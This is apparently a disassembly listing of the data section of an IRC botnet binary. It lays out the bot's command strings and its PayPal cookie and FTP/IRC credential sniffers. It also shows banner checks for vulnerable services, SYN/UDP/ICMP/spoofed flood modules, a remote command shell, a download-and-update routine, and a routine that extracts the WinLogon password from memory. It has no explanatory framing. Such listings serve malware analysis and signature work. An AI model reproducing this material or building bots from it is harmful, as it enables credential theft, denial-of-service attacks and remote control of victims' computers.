align 10h
dd 4 dup(0)
aId_9 db ':/id',0
align 4
dd 4 dup(0)
aId_10 db ':\id',0
align 10h
dd 4 dup(0)
aId_11 db ':=id',0
align 4
dd 4 dup(0)
a?id db ':?id',0
align 10h
dd 4 dup(0)
aId_12 db ':',27h,'id',0
align 4
dd 4 dup(0)
aId_13 db ':`id',0
align 10h
dd 4 dup(0)
aId_14 db ':~id',0
align 4
dd 4 dup(0)
aId_15 db ': id',0
align 10h
dd 4 dup(0)
a_hashin_0 db ':.hashin',0
align 4
dd 3 dup(0)
aHashin_0 db ':!hashin',0
align 10h
aHashin_1 db ':$hashin',0
align 4
dd 3 dup(0)
aHashin_2 db ':%hashin',0
align 10h
a_secure db ':.secure',0
align 4
dd 3 dup(0)
aSecure_1 db ':!secure',0
align 10h
a_l db ':.l',0
dd 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
a_syn db ':.syn',0
align 4
dd 4 dup(0)
aSyn_0 db ':!syn',0
align 10h
dd 4 dup(0)
aSyn_1 db ':$syn',0
align 4
dd 4 dup(0)
aSyn_2 db ':%syn',0
align 10h
dd 4 dup(0)
aCdkey db ' CDKey ',0
dd 4 dup(0)
aJoin_1 db 'JOIN #',0
align 10h
dd 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
aHttp_0 db 'HTTP',0 ; DATA XREF: .data:00436C54�o
align 4
aFtp db 'FTP',0 ; DATA XREF: .data:00436C50�o
off_4374BC dd offset aFailedToSta_36+25h ; DATA XREF: .data:00436C4C�o
dword_4374C0 dd 544F42h ; DATA XREF: .data:off_436C48�o
; char asc_4374C4[]
asc_4374C4 db '-' ; DATA XREF: sub_412B61+317�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aRecvFailedRetu db '- recv() failed, returned %d',0
align 10h
; char asc_4374F0[]
asc_4374F0 db '-' ; DATA XREF: sub_412B61+2C6�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
; char asc_437524[]
asc_437524 db '-' ; DATA XREF: sub_412B61+24C�o
db 3, 34h, 2
dd 696E7370h, 3026666h, 2Dh
; char aPsniff_0[]
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_412B61+235�o
align 10h
; char asc_437540[]
asc_437540 db '-' ; DATA XREF: sub_412B61+186�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 10h
; char asc_437570[]
asc_437570 db '-' ; DATA XREF: sub_412B61+103�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
; char asc_43759C[]
asc_43759C db '-' ; DATA XREF: sub_412B61+85�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSocketFailedRe db '- socket() failed, returned %d',0
align 4
; char aHashin[]
aHashin db ':!hashin',0 ; DATA XREF: sub_412EEC+103�o
align 4
; char a_hashin[]
a_hashin db ':.hashin',0 ; DATA XREF: sub_412EEC+EE�o
align 10h
; char aIdent_0[]
aIdent_0 db ':!ident',0 ; DATA XREF: sub_412EEC+D9�o
; char a_ident[]
a_ident db ':.ident',0 ; DATA XREF: sub_412EEC+C8�o
; char a_login_1[]
a_login_1 db ':.Login',0 ; DATA XREF: sub_412EEC+B7�o
; char aLogin_0[]
aLogin_0 db ':!Login',0 ; DATA XREF: sub_412EEC+A6�o
; char aLogin[]
aLogin db ':!login',0 ; DATA XREF: sub_412EEC+95�o
; char a_login_0[]
a_login_0 db ':.login',0 ; DATA XREF: sub_412EEC+84�o
; char a366[]
a366 db '366 ',0 ; DATA XREF: sub_412EEC+73�o
align 4
; char a302[]
a302 db '302 ',0 ; DATA XREF: sub_412EEC:loc_412F4E�o
align 10h
; char aJoin_0[]
aJoin_0 db 'JOIN #',0 ; DATA XREF: sub_412EEC+4D�o
align 4
; char aPsniff_2[]
aPsniff_2 db 'PSNIFF//',0 ; DATA XREF: sub_412EEC+3C�o
align 4
; char aPsniff_1[]
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412EEC+2B�o
align 10h
; char aBotSniff[]
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412EEC+5�o
align 4
; char aYouAreNowAnIrc[]
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_413003+62�o
; char aOper_0[]
aOper_0 db 'oper ',0 ; DATA XREF: sub_413003+51�o
align 10h
; char aNick_1[]
aNick_1 db 'NICK ',0 ; DATA XREF: sub_413003:loc_413043�o
; sub_413079+2B�o
align 4
; char aOper[]
aOper db 'OPER ',0 ; DATA XREF: sub_413003+2B�o
align 10h
; char aIrcSniff[]
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_413003+5�o
align 4
; char aPass_0[]
aPass_0 db 'PASS ',0 ; DATA XREF: sub_413079+73�o
align 4
; char aUser_2[]
aUser_2 db 'USER ',0 ; DATA XREF: sub_413079+62�o
align 4
; char a230[]
a230 db '230 ',0 ; DATA XREF: sub_413079:loc_4130CA�o
align 4
; char a220[]
a220 db '220 ',0 ; DATA XREF: sub_413079+3C�o
align 4
; char aFtpSniff[]
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_413079+5�o
align 4
; char aSetCookie[]
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_413100+73�o
; char aPaypal_com_0[]
aPaypal_com_0 db 'paypal.com',0 ; DATA XREF: sub_413100+62�o
align 10h
; char aPaypal_com[]
aPaypal_com db 'PAYPAL.COM',0 ; DATA XREF: sub_413100+51�o
align 4
; char aPaypal_0[]
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_413100:loc_413140�o
align 4
; char aPaypal[]
aPaypal db 'paypal',0 ; DATA XREF: sub_413100+2B�o
align 4
; char aHttpSniff[]
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_413100+5�o
align 4
; char aOpenssh_2[]
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_413187+51�o
align 4
; char aServUFtpServer[]
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_413187:loc_4131C7�o
align 4
; char aOpenssl0_9_6[]
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_413187+2B�o
align 4
; char aVulnSniff[]
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_413187+5�o
align 4
unk_437734 db 2Dh ; - ; DATA XREF: sub_4131EC+3EC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
; char asc_43776C[]
asc_43776C db '-' ; DATA XREF: sub_4131EC+382�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_4377A4 db 2Dh ; - ; DATA XREF: sub_4131EC+351�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
unk_4377D8 db 2Dh ; - ; DATA XREF: sub_4131EC+31B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_43780C db 2Dh ; - ; DATA XREF: sub_4131EC+2E2�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
; char asc_437840[]
asc_437840 db '-' ; DATA XREF: sub_4131EC+14B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 10h
; char asc_437870[]
asc_437870 db '-' ; DATA XREF: sub_4131EC+C5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 4
; char asc_43789C[]
asc_43789C db '-' ; DATA XREF: sub_4135DF+5E�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
; char asc_4378C4[]
asc_4378C4 db '-' ; DATA XREF: sub_413694+302�o
db 3, 34h, 2
dd 736F6464h, 202D0302h, 646E6573h, 72726520h, 203A726Fh
dd 6425h
; char asc_4378E0[]
asc_4378E0 db '-' ; DATA XREF: sub_413A29+397�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
; char asc_43792C[]
asc_43792C db '-' ; DATA XREF: sub_413A29+307�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 4
; char asc_437974[]
asc_437974 db '-' ; DATA XREF: sub_413A29+12A�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 4
; char asc_437994[]
asc_437994 db '-' ; DATA XREF: sub_413A29+C2�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
; char asc_4379C4[]
asc_4379C4 db '-' ; DATA XREF: sub_413A29+49�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 10h
; char asc_4379F0[]
asc_4379F0 db '-' ; DATA XREF: sub_413E10+13C�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 4
; char asc_437A1C[]
asc_437A1C db '-' ; DATA XREF: sub_413E10+6E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
; char asc_437A44[]
asc_437A44 db '-' ; DATA XREF: sub_413F9C+1C6�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 10h
; char asc_437A70[]
asc_437A70 db '-' ; DATA XREF: sub_413F9C+8E�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 4
; char asc_437A98[]
asc_437A98 db '-' ; DATA XREF: sub_4141B2+4B�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 4
; char asc_437AC4[]
asc_437AC4 db '-' ; DATA XREF: sub_414358+4B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
; char asc_437AEC[]
asc_437AEC db '-' ; DATA XREF: sub_4143F7+27D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
; char asc_437B0C[]
asc_437B0C db '-' ; DATA XREF: sub_414703+4F�o
db 3, 34h, 2
dd 67726174h, 3023361h
aDoneWithFlood_ db '- Done with flood.',0
align 4
; char asc_437B2C[]
asc_437B2C db '-' ; DATA XREF: sub_4149C1+4EB�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
; char asc_437B7C[]
asc_437B7C db '-' ; DATA XREF: sub_4149C1+44F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
; char asc_437BCC[]
asc_437BCC db '-' ; DATA XREF: sub_4149C1+15F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
; char asc_437BEC[]
asc_437BEC db '-' ; DATA XREF: sub_4149C1+EE�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
; char asc_437C24[]
asc_437C24 db '-' ; DATA XREF: sub_4149C1+70�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 4
; char asc_437C58[]
asc_437C58 db '-' ; DATA XREF: sub_414F57+66�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 4
; char asc_437C8C[]
asc_437C8C db '-' ; DATA XREF: sub_41525A+4D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
align 4
unk_437CCC db 2Dh ; - ; DATA XREF: sub_4152D1+345�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorSending_2 db '- Error sending packets to %s. eax=SOCKET_ERROR, WSAGetLastError('
db ')=%d. sizeof(buffer) = %d. Packets sent sucessfully = %d.',0
; char asc_437D58[]
asc_437D58 db '-' ; DATA XREF: sub_4152D1+2F3�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aFinishedSend_1 db '- Finished sending packets to %s. Sent %d packet(s). ~%dMB of dat'
db 'a sent (~%dK/s).',0
align 4
; char asc_437DBC[]
asc_437DBC db '-' ; DATA XREF: sub_4152D1+CC�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aSendingPackets db '- Sending packets to %s...',0
; char asc_437DE8[]
asc_437DE8 db '-' ; DATA XREF: sub_4152D1+80�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aInvalidTarge_1 db '- Invalid target IP. WSAGetLastError() returns %d.',0
unk_437E2C db 2Dh ; - ; DATA XREF: sub_4152D1+63�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSe db '- Error calling setsockopt(). WSAGetLastError() returns %d.',0
align 4
; char asc_437E7C[]
asc_437E7C db '-' ; DATA XREF: sub_4152D1+2A�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aErrorCallingSo db '- Error calling socket().',0
align 4
; char asc_437EA8[]
asc_437EA8 db '-' ; DATA XREF: sub_41561D+60�o
db 3, 34h, 2
db 77h ; w
db 6Fh, 6Eh, 6Bh
db 2
db 3, 2Dh, 20h
aDoneWithFloodP db 'Done with flood, ports hit: %s',0
align 4
; char aSD[]
aSD db '%s%d ',0 ; DATA XREF: sub_4157BA+204�o
align 4
; char aD_[]
aD_ db '%d. ' ; DATA XREF: sub_415CC0+35�o
dd 73253403h, 203D2003h, 73253703h, 3
dword_437EF0 dd 234032Dh, 61696C61h, 696C2073h, 3027473h, 2Dh ; DATA XREF: sub_415CC0+10�o
; char a_2d_2d4d_2d_2d[]
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_415D38+60�o
align 4
dword_437F28 dd 234032Dh, 3676F6Ch, 43202D02h, 7261656Ch, 2E6465h
; DATA XREF: sub_415DD8:loc_415E0D�o
dword_437F3C dd 234032Dh, 2676F6Ch, 63202D03h, 7261656Ch, 6465h
; DATA XREF: sub_415DD8+20�o
; char asc_437F50[]
asc_437F50 db '-' ; DATA XREF: sub_415E4B+DC�o
db 3, 34h, 2
dd 2676F6Ch, 6C202D03h, 20747369h, 706D6F63h, 6574656Ch
dd 0
dword_437F6C dd 234032Dh, 2676F6Ch, 6C202D03h, 20747369h, 72617473h
; DATA XREF: sub_415E4B+3F�o
dd 676E6974h, 0
; char asc_437F88[]
asc_437F88 db '-' ; DATA XREF: sub_416000+170�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSendTo db '- failed to send to Remote command shell',0
align 4
; char asc_437FBC[]
asc_437FBC db '-' ; DATA XREF: sub_416000+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenRe db '- failed to open remote command shell',0
align 4
; char asc_437FEC[]
asc_437FEC db '-' ; DATA XREF: sub_416000+47�o
; sub_4161C1+FD�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToOpenSo db '- failed to open socket',0
align 10h
; char asc_438010[]
asc_438010 db '-' ; DATA XREF: sub_4161C1+362�o
; sub_416563+156�o
db 3, 34h, 2
dd 2636364h, 73202D03h, 656B636Fh, 72652074h, 726F72h
; char asc_438028[]
asc_438028 db '-' ; DATA XREF: sub_4161C1+2FA�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileSSentToSSB db '- file %s sent to %s (%s bytes).',0
align 4
; char asc_438054[]
asc_438054 db '-' ; DATA XREF: sub_4161C1+202�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aUnableToOpenSo db '- unable to open socket',0
align 4
dword_438078 dd 234032Dh, 2636364h, 73202D03h, 20646E65h, 656D6974h
; DATA XREF: sub_4161C1+1CB�o
dd 74756Fh
; char dword_438090
dword_438090 dd 43434401h, 4E455320h, 73252044h, 20692520h, 25206925h
; DATA XREF: sub_4161C1+16A�o
dd 169h
unk_4380A8 db 2Dh ; - ; DATA XREF: sub_4161C1+127�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFileDoesnTExis db '- file doesn',27h,'t exist',0
align 4
unk_4380C8 db 2Dh ; - ; DATA XREF: sub_4161C1+82�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToBindTo db '- failed to bind to socket',0
unk_4380EC db 2Dh ; - ; DATA XREF: sub_4161C1+44�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToCrea_2 db '- failed to create socket',0
align 10h
; char asc_438110[]
asc_438110 db '-' ; DATA XREF: sub_416563+1D1�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 4
; char asc_43813C[]
asc_43813C db '-' ; DATA XREF: sub_416563+CB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
unk_43815C db 2Dh ; - ; DATA XREF: sub_416563+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 4
; char aAB[]
aAB db 'a+b',0 ; DATA XREF: sub_416563+97�o
unk_43818C db 2Dh ; - ; DATA XREF: sub_416563+83�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 4
; char asc_4381BC[]
asc_4381BC db '-' ; DATA XREF: sub_4167A0+493�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
unk_4381E8 db 2Dh ; - ; DATA XREF: sub_4167A0+485�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 4
; char asc_43821C[]
asc_43821C db '-' ; DATA XREF: sub_4167A0+3C9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 10h
; char asc_438260[]
asc_438260 db '-' ; DATA XREF: sub_4167A0+358�o
db 3, 34h, 2
dd 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh, 25206465h
dd 73h
; char asc_43827C[]
asc_43827C db '-' ; DATA XREF: sub_4167A0+2E1�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 4
; char asc_4382B4[]
asc_4382B4 db '-' ; DATA XREF: sub_4167A0+262�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 4
; char asc_4382DC[]
asc_4382DC db '-' ; DATA XREF: sub_4167A0+1D8�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 4
; char asc_438308[]
asc_438308 db '-' ; DATA XREF: sub_4167A0+195�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 10h
unk_438330 db 2Dh ; - ; DATA XREF: sub_4167A0+183�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 4
; char asc_438358[]
asc_438358 db '-' ; DATA XREF: sub_4167A0+77�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_416D48:loc_416D8B�o
; sub_419443+10A�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_416D48:loc_416D85�o
aDisk db 'Disk',0 ; DATA XREF: sub_416D48:loc_416D7F�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_416D48:loc_416D79�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_416D48:loc_416D73�o
align 4
off_4383A8 dd offset word_4D4152 ; DATA XREF: sub_416D48:loc_416D6D�o
word_4383AC dw 3Fh ; DATA XREF: sub_416D48+1F�o
; sub_41AF8F:loc_41B091�r
align 10h
; char aFailed[]
aFailed db 'failed',0 ; DATA XREF: sub_416DD9:loc_416EB7�o
; sub_416EFD+3B�o
align 4
; char aSkb[]
aSkb db '%sKB',0 ; DATA XREF: sub_416DD9+6C�o
align 10h
; char asc_4383C0[]
asc_4383C0 db '-' ; DATA XREF: sub_416EFD+8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 4
; char asc_4383FC[]
asc_4383FC db '-' ; DATA XREF: sub_416EFD+58�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
; char aA_1[]
aA_1 db 'A:\',0 ; DATA XREF: sub_416FCF:loc_417014�o
; char asc_43843C[]
asc_43843C db '-' ; DATA XREF: sub_417054+C8�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 64252064h
dd 6C696620h, 7365h
; char asc_43845C[]
asc_43845C db '-' ; DATA XREF: sub_417054+5C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
; char asc_438484[]
asc_438484 db '-' ; DATA XREF: sub_41716F+107�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 73252064h
dd 73255Ch
; char aS_3[]
aS_3 db '%s\*',0 ; DATA XREF: sub_41716F+1A�o
align 4
; char asc_4384A8[]
asc_4384A8 db '-' ; DATA XREF: sub_4172C1:loc_41743A�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
; char asc_4384DC[]
asc_4384DC db '-' ; DATA XREF: sub_4172C1:loc_41740D�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
unk_438508 db 2Dh ; - ; DATA XREF: sub_4172C1:loc_417406�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindTh db 'unable to find the password in memory',0
align 10h
; char asc_438540[]
asc_438540 db '-' ; DATA XREF: sub_4172C1+117�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
aUserdomain: ; DATA XREF: sub_4172C1+DC�o
unicode 0, <USERDOMAIN>,0
align 4
aUsername: ; DATA XREF: sub_4172C1+CE�o
unicode 0, <USERNAME>,0
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_4172C1+9A�o
align 4
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_4172C1+8D�o
align 10h
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_4172C1+80�o
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_4172C1+73�o
align 4
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_4172C1+68�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_4172C1+55�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_4172C1+40�o
; sub_4172C1+161�o ...
align 4
unk_438678 db 2Dh ; - ; DATA XREF: sub_4172C1+35�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aOnlySupportedO db 'only supported on winnt/win2k',0
align 4
; char aMsgina[]
aMsgina db 'MSGINA',0 ; DATA XREF: sub_417493+13E�o
align 10h
; char aNwgina[]
aNwgina db 'NWGINA',0 ; DATA XREF: sub_417493+123�o
align 4
; char aWinlogon[]
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_417493+AF�o
align 4
; char asc_4386C4[]
asc_4386C4 db '-' ; DATA XREF: sub_4178F9+70�o
; sub_417990+C7�o
